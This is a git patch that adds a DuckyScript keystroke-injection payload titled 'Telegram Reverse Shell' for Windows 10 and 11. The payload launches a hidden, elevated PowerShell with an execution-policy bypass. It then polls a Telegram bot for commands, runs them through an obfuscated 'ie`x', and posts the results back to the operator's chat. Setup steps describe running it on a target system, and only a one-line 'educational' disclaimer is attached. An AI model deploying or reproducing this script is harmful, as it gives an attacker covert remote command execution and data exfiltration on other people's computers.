From 711e9e6d1723ddfa994d33a58e34c7ebb3de891b Mon Sep 17 00:00:00 2001 From: beigeworm <93350544+beigeworm@users.noreply.github.com> Date: Wed, 5 Jul 2023 23:40:48 +0000 Subject: [PATCH] Add files via upload --- OSINT/Telegram Reverse Shell.txt | 57 ++++++++++++++++++++++++++++++++ 1 file changed, 57 insertions(+) create mode 100644 OSINT/Telegram Reverse Shell.txt diff --git a/OSINT/Telegram Reverse Shell.txt b/OSINT/Telegram Reverse Shell.txt new file mode 100644 index 0000000..23eaf88 --- /dev/null +++ b/OSINT/Telegram Reverse Shell.txt @@ -0,0 +1,57 @@ +REM Title: Simple Telegram Reverse Shell +REM Author: @beigeworm +REM Description: This script connects target computer with a telegram chat to send powershell commands. +REM Target: Windows 10,11 + +REM SETUP INSTRUCTIONS +REM 1. visit https://t.me/botfather and make a bot. +REM 2. add bot api to script. +REM 3. search for bot in top left box in telegram and start a chat then type /start. +REM 4. add chat ID in 'CHAT_ID_HERE' for the chat bot (run this code below to find the chat id) +REM --------------------------------------------------- +REM $token='YOUR_TOKEN_HERE' #Replace this with your bot Token +REM $URL='https://api.telegram.org/bot{0}' -f $Token +REM $inMessage=Invoke-RestMethod -Method Get -Uri ($URL +'/getUpdates') -ErrorAction Stop +REM $inMessage.result.message | write-output +REM $inMessage.result.message | get-member +REM ----------------------------------------------------- +REM 5. Run Script on target System +REM 6. Check telegram chat for 'waiting to connect' message. +REM 7. this script has a feature to wait until you start the session from telegram. +REM 8. type in the computer name from that message into telegram bot chat to connect to that computer. + +REM THIS SCRIPT IS A PROOF OF CONCEPT FOR EDUCATIONAL PURPOSES ONLY. + +REM Setup for duckyscript +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window) +GUI r +DELAY 750 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass +CTRL-SHIFT ENTER +DELAY 1500 +ALT y +DELAY 4000 + +STRING $Token = 'YOUR_TOKEN_HERE';$ChatID = "CHAT_ID_HERE";$PassPhrase = "$env:COMPUTERNAME";$URL='https://api.telegram.org/bot{0}' -f $Token ;$AccSesH="";$LastUmsg="";$LastmsgID="";sleep 1 + +STRING ;$Mtsend = New-Object psobject ;$Mtsend | Add-Member -MemberType NoteProperty -Name 'chat_id' -Value $ChatID;$Mtsend | Add-Member -MemberType NoteProperty -Name 'text' -Value "$env:COMPUTERNAME Waiting to Connect.." +STRING ;Invoke-RestMethod -Method Post -Uri ($URL +'/sendMessage') -Body ($Mtsend | ConvertTo-Json) -ContentType "application/json";Sleep 5 +STRING ;Function IsAuth{param($CheckMessage)if (($messages.message.date -ne $LastUmsg) -and ($CheckMessage.message.text -like $PassPhrase) -and ($CheckMessage.message.from.is_bot -like $false)){$script:AccSesH="Authenticated" +STRING ;$Mtsend = New-Object psobject ;$Mtsend | Add-Member -MemberType NoteProperty -Name 'chat_id' -Value $ChatID;$Mtsend | Add-Member -MemberType NoteProperty -Name 'text' -Value "$env:COMPUTERNAME Session Started." +STRING ;Invoke-RestMethod -Method Post -Uri ($URL +'/sendMessage') -Body ($Mtsend | ConvertTo-Json) -ContentType "application/json";return $messages.message.chat.id}Else{return 0}} + +STRING ;Function StrmFX{param($Stream)$FixRslt=@() +STRING ;$Stream | Out-File -FilePath (Join-Path $env:TMP -ChildPath "TGPSMessages.txt") -Force;$ReadAsArray= Get-Content -Path (Join-Path $env:TMP -ChildPath "TGPSMessages.txt") | where {$_.length -gt 0} +STRING ;foreach ($line in $ReadAsArray){;$ArrObj=New-Object psobject;$ArrObj | Add-Member -MemberType NoteProperty -Name "Line" -Value ($line).tostring();$FixRslt +=$ArrObj}return $FixRslt} + +STRING ;Function stgmsg{param($Messagetext,$ChatID)$FixedText=StrmFX -Stream $Messagetext +STRING ;$Mtsend = New-Object psobject ;$Mtsend | Add-Member -MemberType NoteProperty -Name 'chat_id' -Value $ChatID;$Mtsend | Add-Member -MemberType NoteProperty -Name 'text' -Value $FixedText.line +STRING ;$JsonData=($Mtsend | ConvertTo-Json);Invoke-RestMethod -Method Post -Uri ($URL +'/sendMessage') -Body $JsonData -ContentType "application/json"} +STRING ;Function rtgmsg{try{$inMessage=Invoke-RestMethod -Method Get -Uri ($URL +'/getUpdates') -ErrorAction Stop;return $inMessage.result[-1]}Catch{return "Fail"}} +STRING ;Sleep 3;While ($true){sleep 2;$messages=rtgmsg;if($LastUmsg -like $null){$LastUmsg=$messages.message.date};if(!($AccSesH)){$CheckAuthentication=IsAuth -CheckMessage $messages}Else{ +STRING ;if(($CheckAuthentication -ne 0) -and ($messages.message.text -notlike $PassPhrase) -and ($messages.message.date -ne $LastmsgID)){try{$Result=ie`x($messages.message.text) -ErrorAction Stop;$Result +STRING ;stgmsg -Messagetext $Result -ChatID $messages.message.chat.id}catch{stgmsg -Messagetext ($_.exception.message) -ChatID $messages.message.chat.id}Finally{$LastmsgID=$messages.message.date}}}};sleep 5;exit + +ENTER \ No newline at end of file